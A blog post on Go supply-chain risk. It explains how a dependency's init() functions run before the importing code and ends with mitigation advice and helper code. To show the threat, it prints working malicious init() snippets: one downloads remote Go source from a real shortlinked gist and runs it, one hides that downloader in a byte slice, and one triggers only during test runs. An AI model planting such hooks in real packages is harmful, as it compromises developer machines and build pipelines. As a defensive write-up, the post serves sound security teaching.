Golang: stop trusting your dependencies!

Paulo Gomes

2 Apr 2020

Can your dependencies take over your application? What about their dependencies? Here I will cover how blind trust can jeopardise not only your application's security but also your own.

Over 30 years ago, in his Turing Award lecture “Reflections on Trusting Trust”, Ken Thompson said that…

You can’t trust code that you did not totally create yourself.

I find that statement quite troubling, especially now that code-sharing platforms (e.g. GitHub) and the exciting boom of open source allow developers to easily share code with the entire world. To use someone else's library in golang you are one import away, no questions asked. You don't even need to read a single line of its code before using it.

All of that is absolutely amazing: it allows developers to focus on the problems they are trying to solve, instead of reinventing the wheel over and over again. That works brilliantly as long as we assume that everyone has good intentions and that everyone secures their git credentials as if their lives depended on it. But what if that isn't the case? What damage could a malicious library do to your application? To your machine? To your production environment? What would an implementation look like? How easy is it to spot malicious code?

Today, I will try to answer those questions and, at the end, offer a few recommendations on how to contain rogue dependencies.

DISCLAIMER: Some of the techniques shown here can be useful for red-teaming inside organisations, to identify weak links in processes and gaps in training. I certainly do not recommend using them on the public internet. The main goal of this post is to encourage you to better protect yourself (and your applications) against malicious dependencies.

## Package initialisation as the starting point

Recently, I created an application to extract the system calls from Go binaries. It walks through the disassembly of an application and follows its execution paths, taking note of every system call that could happen along the way.

By analysing the disassembly of several golang applications I realised something that was later confirmed by the official documentation on the init() function:

init is called after all the variable declarations in the package have evaluated their initializers, and those are evaluated only after all the imported packages have been initialized.



My interpretation was that imported packages take precedence over my own code: the init() functions of all imported packages run first, then my own, and only then does my actual code execute. A quick proof of concept was enough to confirm it:

Yes, the init() from my dependency lib1 was executed before anything inside my main.go. I then added an extra layer, giving lib1 its own dependency, lib2, with an init() of its own, and the same thing happened: lib2.init() was called first, then lib1.init(), and so on. In this scenario, the code of my dependencies' dependencies always executes before any of my own code.

That is quite powerful! On the bright side, it enables features such as "import for side effects", which the image/png package uses to register its PNG decoder with the image package. But on the dark side, a malicious package gets a lot of control over what to execute and when, and could even hijack the application's execution entirely, since its code is loaded and run at a very early stage.
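The proof of concept above spans several packages and survives only as screenshots. As a rough single-file sketch (so it can only show the order within one package, not across packages), the program below records when a package-level variable initialiser, two init() functions and main() run. trace and record are illustrative names, not part of any library. Running it should print the four steps in exactly that order.

```go
package main

import "fmt"

// trace collects the order in which package-level code runs.
var trace []string

// record appends a step to trace and returns it, so it can be called from a
// package-level variable initialiser.
func record(step string) string {
	trace = append(trace, step)
	return step
}

// Package-level variable initialisers run before any init() function.
var early = record("var initialiser")

// A package may declare several init() functions; within one file they run
// in the order in which they appear.
func init() { record("first init()") }

func init() { record("second init()") }

func main() {
	record("main()")
	for i, step := range trace {
		fmt.Println(i+1, step)
	}
}
```

With real dependencies the same rule applies one level up: an imported package is fully initialised (variables, then init()) before the importing package starts its own initialisation.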

## What about packages that are not being called?

What about packages that are imported but not used? An unused import is a compile error in Go (and tools such as goimports remove them automatically); however, if you prefix the import with _ (a blank import), it is kept in place:

_ "github.com/unused/dependency"



If main.go stops calling lib1 (using strings.TrimSpace instead) but keeps lib1 as a blank import, is its init() still called?

Yes, it is! But note that package-level variable initialisation has even higher precedence. If lib1 had a variable initialised with an anonymous function:

var abc string = func() string {
	fmt.Println("lib.abc")
	return ""
}()

this would be executed before its init() function is called. That makes both places prime spots for starting code execution, and they are generally the first thing I look for when code reviewing my dependencies.
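Since init() functions and package-level initialisers that make calls are where a dependency first gets to run code, a review can start by listing them. The sketch below uses the standard go/parser and go/ast packages to do that for a single source file. findEarlyExec, Finding and containsCall are hypothetical names, and the check is deliberately crude (type conversions also parse as calls, so it over-reports); treat its output as a reading list, not a verdict.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// Finding describes a piece of code that runs at package initialisation.
type Finding struct {
	Kind string // "func" for init() functions, "var" for package-level initialisers
	Name string
	Line int
}

// containsCall reports whether a function call (or conversion) appears in n.
func containsCall(n ast.Node) bool {
	found := false
	ast.Inspect(n, func(c ast.Node) bool {
		if _, ok := c.(*ast.CallExpr); ok {
			found = true
		}
		return !found // stop descending once a call has been found
	})
	return found
}

// findEarlyExec parses one Go source file and lists its init() functions and
// the package-level variables whose initialiser makes a call.
func findEarlyExec(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var out []Finding
	for _, decl := range f.Decls {
		switch d := decl.(type) {
		case *ast.FuncDecl:
			if d.Recv == nil && d.Name.Name == "init" {
				out = append(out, Finding{Kind: "func", Name: "init", Line: fset.Position(d.Pos()).Line})
			}
		case *ast.GenDecl:
			if d.Tok != token.VAR {
				continue
			}
			for _, spec := range d.Specs {
				vs := spec.(*ast.ValueSpec)
				for i, v := range vs.Values {
					if !containsCall(v) {
						continue
					}
					name := vs.Names[0].Name
					if i < len(vs.Names) {
						name = vs.Names[i].Name
					}
					out = append(out, Finding{Kind: "var", Name: name, Line: fset.Position(v.Pos()).Line})
				}
			}
		}
	}
	return out, nil
}

// sample mirrors the lib1 variable shown above, plus an init().
const sample = `package lib1

import "fmt"

var abc string = func() string {
	fmt.Println("lib.abc")
	return ""
}()

var plain = 42

func init() { fmt.Println("lib1.init") }
`

func main() {
	findings, err := findEarlyExec("lib1.go", sample)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("line %d: %s %s\n", f.Line, f.Kind, f.Name)
	}
}
```

To cover a whole module you would walk every .go file of every dependency (for instance under a vendor directory) and feed each one in; that loop is left out to keep the sketch short.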

## With precedence comes great power!

Obviously, a dependency with malicious tendencies can do harm regardless of when its code is executed. However, init() guarantees that once a package is imported, its initialisation code runs before any code in the package that imported it.



This can be quite useful for tampering with start-up configuration. For example, a dependency could fiddle with your HTTP server settings:



If the main application above imports lib1, it will work as normal. However, it will also serve every static file under the machine's root folder whenever a path under /s/ is requested:



This allows end users of the web application to access any file that your application has access to:

That is just a silly example but, again, once your dependencies go rogue, their guaranteed execution precedence gives them plenty of leeway in what they can do.

## Ideas on implementation…

One of the great things about golang is that you don't need to package your libraries to distribute them. You import a package directly from its repository. Ultimately, what you see in someone's repository is what you get when you import it.

Therefore, any malicious code would need to conceal its intentions to avoid being caught in a simple code review, assuming that developers actually review the entirety of their dependencies. It could also be disguised as sloppy programming, so that what it actually does is not too obvious.

Below are three potential implementations:

1. Allowing remote behaviour changes

This example downloads a Go source file from a GitHub gist and runs it locally:

func init () {

// a: = "http://tiny.cc/0fqtgz" // -> https://gist.githubusercontent.com/pjbgf/222b28c7a3e039cef8dd9ee8a185a36b/raw

a: = [] byte {104, 116, 116, 112, 58, 47, 47, 116, 105, 110, 121, 46, 99, 99, 47, 48, 102, 113, 116, 103, 122}

if r, e: = http.Get (string (a)); e == nil && r.ContentLength> 10 {

if c, e: = ioutil.ReadAll (r.Body); e == nil {

if f, e: = ioutil.TempFile ("", "go-build * .go"); e == nil {

if _, e: = f.Write (c); e == nil {

defer os.Remove (f.Name ())

exec.Command ("bash", "-c", "go run" + f.Name ()). Start ()

}

}

}

}

}

This allows for an attacker to change the behaviour remotely and even disable it by creating a really small gist (note the r.ContentLength).

2. Self-contained

Another approach is to embed the malicious implementation alongside the rest of the code, but stored in a different format; for example, as a byte slice:

func init() {

a := []byte{112, 97, 99, 107, 97, 103, 101, 32, 109, 97, 105, 110, 10, 105, 109, 112, 111, 114, 116, 32, 40, 34, 105, 111, 47, 105, 111, 117, 116, 105, 108, 34, 59, 34, 110, 101, 116, 47, 104, 116, 116, 112, 34, 59, 34, 111, 115, 34, 59, 34, 111, 115, 47, 101, 120, 101, 99, 34, 41, 10, 102, 117, 110, 99, 32, 109, 97, 105, 110, 40, 41, 123, 32, 105, 102, 32, 114, 44, 32, 101, 32, 58, 61, 32, 104, 116, 116, 112, 46, 71, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 116, 105, 110, 121, 46, 99, 99, 47, 48, 102, 113, 116, 103, 122, 34, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 32, 105, 102, 32, 99, 44, 32, 101, 32, 58, 61, 32, 105, 111, 117, 116, 105, 108, 46, 82, 101, 97, 100, 65, 108, 108, 40, 114, 46, 66, 111, 100, 121, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 32, 105, 102, 32, 102, 44, 32, 101, 32, 58, 61, 32, 105, 111, 117, 116, 105, 108, 46, 84, 101, 109, 112, 70, 105, 108, 101, 40, 34, 34, 44, 32, 34, 103, 111, 45, 98, 117, 105, 108, 100, 42, 46, 103, 111, 34, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 32, 105, 102, 32, 95, 44, 32, 101, 32, 58, 61, 32, 102, 46, 87, 114, 105, 116, 101, 40, 99, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 100, 101, 102, 101, 114, 32, 111, 115, 46, 82, 101, 109, 111, 118, 101, 40, 102, 46, 78, 97, 109, 101, 40, 41, 41, 59, 99, 109, 100, 32, 58, 61, 32, 101, 120, 101, 99, 46, 67, 111, 109, 109, 97, 110, 100, 40, 34, 98, 97, 115, 104, 34, 44, 32, 34, 45, 99, 34, 44, 32, 34, 103, 111, 32, 114, 117, 110, 32, 34, 43, 102, 46, 78, 97, 109, 101, 40, 41, 41, 59, 99, 109, 100, 46, 82, 117, 110, 40, 41, 125, 125, 125, 125, 125, 10}

if file, err := ioutil.TempFile("", "go-build*.go"); err == nil {

if _, err := file.Write(a); err == nil {

defer os.Remove(file.Name())

exec.Command("bash", "-c", fmt.Sprintf("go run %s", file.Name())).Start()

}

}

}

The byte slice a above contains the source code of the first example, so it downloads the exact same gist and executes it locally. However, it makes it much less obvious that a web request is being made.

Note that the byte slice could just as well contain the implementation of a Go reverse shell, which would give the attacker shell access to the machine that executed it.

3. Disguising execution

A serious implementation would lie dormant and execute only when it is unlikely to be noticed. One way for the compilation and execution of this code to go unnoticed would be to run it only when the developer is running their application's tests. This also makes it more likely that a Go toolchain is installed on the machine.

When you run your tests you are actually running a specially compiled version of your source code; on Linux machines that executable is a temporary file whose name ends in .test. The example below runs example 2 only during test executions:

func init() {

exec, _ := os.Executable()

if strings.HasSuffix(exec, ".test") {

a := []byte{112, 97, 99, 107, 97, 103, 101, 32, 109, 97, 105, 110, 10, 105, 109, 112, 111, 114, 116, 32, 40, 34, 105, 111, 47, 105, 111, 117, 116, 105, 108, 34, 59, 34, 110, 101, 116, 47, 104, 116, 116, 112, 34, 59, 34, 111, 115, 34, 59, 34, 111, 115, 47, 101, 120, 101, 99, 34, 41, 10, 102, 117, 110, 99, 32, 109, 97, 105, 110, 40, 41, 123, 32, 105, 102, 32, 114, 44, 32, 101, 32, 58, 61, 32, 104, 116, 116, 112, 46, 71, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 116, 105, 110, 121, 46, 99, 99, 47, 48, 102, 113, 116, 103, 122, 34, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 32, 105, 102, 32, 99, 44, 32, 101, 32, 58, 61, 32, 105, 111, 117, 116, 105, 108, 46, 82, 101, 97, 100, 65, 108, 108, 40, 114, 46, 66, 111, 100, 121, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 32, 105, 102, 32, 102, 44, 32, 101, 32, 58, 61, 32, 105, 111, 117, 116, 105, 108, 46, 84, 101, 109, 112, 70, 105, 108, 101, 40, 34, 34, 44, 32, 34, 103, 111, 45, 98, 117, 105, 108, 100, 42, 46, 103, 111, 34, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 32, 105, 102, 32, 95, 44, 32, 101, 32, 58, 61, 32, 102, 46, 87, 114, 105, 116, 101, 40, 99, 41, 59, 32, 101, 32, 61, 61, 32, 110, 105, 108, 32, 123, 100, 101, 102, 101, 114, 32, 111, 115, 46, 82, 101, 109, 111, 118, 101, 40, 102, 46, 78, 97, 109, 101, 40, 41, 41, 59, 99, 109, 100, 32, 58, 61, 32, 101, 120, 101, 99, 46, 67, 111, 109, 109, 97, 110, 100, 40, 34, 98, 97, 115, 104, 34, 44, 32, 34, 45, 99, 34, 44, 32, 34, 103, 111, 32, 114, 117, 110, 32, 34, 43, 102, 46, 78, 97, 109, 101, 40, 41, 41, 59, 99, 109, 100, 46, 82, 117, 110, 40, 41, 125, 125, 125, 125, 125, 10}

if file, err := ioutil.TempFile("", "go-build*.go"); err == nil {

if _, err := file.Write(a); err == nil {

defer os.Remove(file.Name())

exec.Command("bash", "-c", fmt.Sprintf("go run %s", file.Name())).Start()

}

}

}

}

In other words, simply running their application's tests would be enough for a developer to trigger the malicious code.

What aggravates this scenario is that developers tend to be quite privileged on their own machines. And when they are not, there is nowadays a reasonable chance that they have:

- Docker installed and their user in the docker group, which by itself offers extremely easy privilege escalation.

- cloud credentials on their machines, allowing access to other environments.

Hiding in plain sight…

This implementation could probably be reduced to even fewer lines of code and scattered across a few files; after all, a package can have multiple init() functions and package-level variable initialisations. :)

If well named and arranged to mingle with the rest of the library's code, this could well pass unnoticed. Remember the power of init(): the code can be buried several imports deep and it will still run first.

## What could the impact be, then?

In terms of what can be achieved, here are a few ideas of what may happen when malicious code is executed on development machines or in your build pipelines:

- Exfiltration of SSH/GPG keys, cloud credentials (an example for .NET with NuGet packages), etc.

- Injection of malicious code in the compiled binary to spread this to other environments.

The last point assumes that the entry point could also be a dependency of a test framework or of a build tool, such as a fuzzer.

Once the malicious code arrives in production:

- Exfiltration of production data and credentials.

- Changes in application behaviour.

- Disruption of services.

And in all cases, there is always the possibility of reverse shells being executed and of malware, crypto-miners, ransomware, etc. being installed.

## OK, but how likely is this to happen?

It all depends on what processes you have in place. But here are a few things to consider on how the malicious code could make its way to your dependencies:

1. Security Carelessness

We tend to implicitly trust project maintainers and open source contributors to take security seriously. But there is no way to assess, let alone enforce, that they follow basic security hygiene.

2. Disgruntled employees/contributors

Someone who left a project or company on bad terms but still has access to key assets and credentials. For example, an employee who leaves behind several projects that depend on open source projects they still have access to.

3. Malicious contributors

Some people may play the long game to attain the status of maintainers, and use that to pursue dishonest ends. An example of social engineering in the open source community:

the hacker was able to take over maintainership of a popular module in the NPM ecosystem. Doing so established a bit of a history, giving the hacker the look of a real maintainer. Then, the module’s actual maintainer handed over maintenance of this package and later explained he did so because he wasn’t compensated for maintaining the module and hadn’t used it in years.

This is not the first example and won't be the last; here's another one.

Certainly there are other actors and vectors to consider when threat modelling this, but these should be a good start.

## Recommendations

Here are a few recommendations to decrease the likelihood of this happening to you, and to limit the damage when it does.

1. Have your own criteria to select or veto dependencies

Before adding a dependency, ensure it adheres to a set of criteria you and your team are happy with:

- Is this project well-maintained?

- Are the maintainers trustworthy and involved in multiple projects?

- Does the project have public security hygiene policies (e.g. all contributors must use 2FA and GPG-sign their commits)?

- How deep is this project's dependency tree? By adding this dependency, how many other dependencies will I "implicitly inherit"?

- Do this project's dependencies also pass my criteria?
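The "how many dependencies will I implicitly inherit" question can be answered from the module graph. As a minimal sketch, the program below parses the output of go mod graph (one "module@version dependency@version" edge per line, with the main module listed without a version) and walks it from the root; transitiveDeps and the example.com module paths are made up for illustration. Because go mod graph lists requirements rather than only the versions minimal version selection finally picks, the count can overestimate what is actually built; go list -m all shows the final build list.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// transitiveDeps parses `go mod graph` output and returns every
// module@version reachable from root (excluding root itself), sorted.
func transitiveDeps(graph, root string) []string {
	edges := map[string][]string{}
	for _, line := range strings.Split(graph, "\n") {
		fields := strings.Fields(line)
		if len(fields) != 2 {
			continue // skip blank or malformed lines
		}
		edges[fields[0]] = append(edges[fields[0]], fields[1])
	}

	// Breadth-first walk from the root module.
	seen := map[string]bool{root: true}
	queue := []string{root}
	var deps []string
	for len(queue) > 0 {
		cur := queue[0]
		queue = queue[1:]
		for _, next := range edges[cur] {
			if !seen[next] {
				seen[next] = true
				deps = append(deps, next)
				queue = append(queue, next)
			}
		}
	}
	sort.Strings(deps)
	return deps
}

// Hypothetical graph: the app adds lib1 directly, which pulls in lib2, then lib3.
const sampleGraph = `example.com/app example.com/lib1@v1.0.0
example.com/lib1@v1.0.0 example.com/lib2@v0.3.0
example.com/lib2@v0.3.0 example.com/lib3@v2.1.0
`

func main() {
	deps := transitiveDeps(sampleGraph, "example.com/app")
	fmt.Printf("%d modules inherited:\n", len(deps))
	for _, d := range deps {
		fmt.Println(" ", d)
	}
}
```

In practice you would feed it the real graph, for example by reading go mod graph output from standard input instead of the sampleGraph constant. Adding one direct dependency here means inheriting three modules.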

2. Isolated Development Environment

Take a zero trust approach and run your development environment isolated from your personal machine by using VMs, containers or remote machines.

VS Code Remote extensions make this process seamless and also make it easier to have disposable development environments, reducing the likelihood of a compromised application or environment affecting others.

3. One-Time Build Pipelines

Extending zero trust to your build pipelines, ensure each build runs on a clean machine or container, so that no persistent threat can outlive a build process and contaminate other builds.

Do not share the same build machine instance across different applications, and isolate critical processes, such as building and packaging your binaries, from everything else, including test execution and the running of other third-party tools.

This is extremely simple to implement nowadays with services such as GitHub Actions and Azure Pipelines, so there is no excuse not to do it.

4. Isolation at run-time

Run your application as if you did not trust it. Use containers to run it in every environment, and use the following security mechanisms to limit its capabilities:

- Use zero trust network concepts and whitelist only the ingress and egress traffic the application needs to run.

- Implement seccomp to whitelist the system calls your application uses.

- Implement SELinux and/or AppArmor to further whitelist the behaviour allowed for the application inside the container.

- Drop all Linux capabilities that are not required.

- Run the container with no-new-privileges enabled (e.g. docker run --security-opt=no-new-privileges) and as a non-root user.
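Most of these restrictions are configured outside the application, but on Linux a process can at least check that they were applied. As a rough sketch, the program below reads the NoNewPrivs, Seccomp and CapEff fields of /proc/self/status, plus the process UID, and reports anything that looks unrestricted. parseStatus and hardeningGaps are hypothetical helpers, and expecting a seccomp filter (mode 2) and an empty effective capability set is an assumption specific to this example. Keep in mind it runs after every dependency's init(), so it cannot stop a rogue package; it only catches a deployment where the container settings were forgotten.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// parseStatus turns the "Key:\tvalue" lines of /proc/<pid>/status into a map.
func parseStatus(s string) map[string]string {
	m := map[string]string{}
	for _, line := range strings.Split(s, "\n") {
		if k, v, ok := strings.Cut(line, ":"); ok {
			m[k] = strings.TrimSpace(v)
		}
	}
	return m
}

// hardeningGaps lists which of the expected run-time restrictions appear to be missing.
func hardeningGaps(status map[string]string, uid int) []string {
	var gaps []string
	if uid == 0 {
		gaps = append(gaps, "running as root")
	}
	if status["NoNewPrivs"] != "1" {
		gaps = append(gaps, "no_new_privs is not set")
	}
	if status["Seccomp"] != "2" { // 0 = disabled, 1 = strict, 2 = filter
		gaps = append(gaps, "no seccomp filter applied")
	}
	if strings.Trim(status["CapEff"], "0") != "" { // non-zero bitmask
		gaps = append(gaps, "effective capabilities present: "+status["CapEff"])
	}
	return gaps
}

func main() {
	raw, err := os.ReadFile("/proc/self/status") // Linux only
	if err != nil {
		fmt.Println("cannot read /proc/self/status:", err)
		return
	}
	for _, gap := range hardeningGaps(parseStatus(string(raw)), os.Getuid()) {
		fmt.Println("warning:", gap)
	}
}
```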

5. Managing Dependencies

A few recommendations on how to manage dependencies:

- Fork projects that are not well-maintained and treat the fork as the source of truth. Your application then imports your fork instead of the upstream, and all upstream changes are dealt with as pull requests into your fork, with all the implications that entails.

- Vendor your dependencies and keep them under version control; this makes it easier to code review changes as part of your application development.

- Always code review your dependencies before adding them to your project.
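Vendoring and reviewing only help if new or changed modules cannot slip in unnoticed. Here is a minimal sketch of a CI-style check, assuming your team keeps a record of which module versions it has reviewed: it parses go list -m all output (the main module on the first line, then one "path version" per line) and lists every module whose version is not in that record. unreviewed, sampleList and the reviewed map are hypothetical; where the record lives (a file in the repository, for instance) is up to you.

```go
package main

import (
	"fmt"
	"strings"
)

// unreviewed compares `go list -m all` output against a map of reviewed
// module path -> version and returns every module that is new or has changed.
func unreviewed(buildList string, reviewed map[string]string) []string {
	var out []string
	for _, line := range strings.Split(buildList, "\n") {
		fields := strings.Fields(line)
		if len(fields) < 2 {
			continue // the main module (no version) or a blank line
		}
		path, version := fields[0], fields[1]
		if reviewed[path] != version {
			out = append(out, path+" "+version)
		}
	}
	return out
}

// Hypothetical build list: lib2 was bumped and lib3 is brand new.
const sampleList = `example.com/app
example.com/lib1 v1.0.0
example.com/lib2 v0.4.0
example.com/lib3 v2.1.0
`

// Hypothetical record of module versions the team has already reviewed.
var reviewed = map[string]string{
	"example.com/lib1": "v1.0.0",
	"example.com/lib2": "v0.3.0",
}

func main() {
	for _, m := range unreviewed(sampleList, reviewed) {
		fmt.Println("needs review:", m)
	}
}
```

In a pipeline you would run it against the real go list -m all output and fail the build whenever the list is not empty.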

## Closing thoughts…

Ultimately, this is not a problem exclusive to golang; it is rather a problem of implicit trust. It is the same in most programming languages, although some are more easily exploitable than others.

We, developers, need to be cognisant that we are responsible for all the code we add to our applications, regardless of who actually wrote it. In the same way that code review is good practice for our teammates' changes, the same applies to open source contributions to our dependencies: we should review them.

No mitigation will be as effective as not depending on a malicious dependency in the first place, so take into consideration one of Golang’s proverbs:

A little copying is better than a little dependency.

Sometimes you don’t actually need to take a full dependency. You could instead develop the functionality yourself or simply copy part of the code — keeping the author's and license details intact of course. :)

And as a closing point, refrain from using libraries that are reckless and have unnecessary or poorly maintained dependencies. To quote Carlos Ruiz Zafón:

Never trust he who trusts everyone.
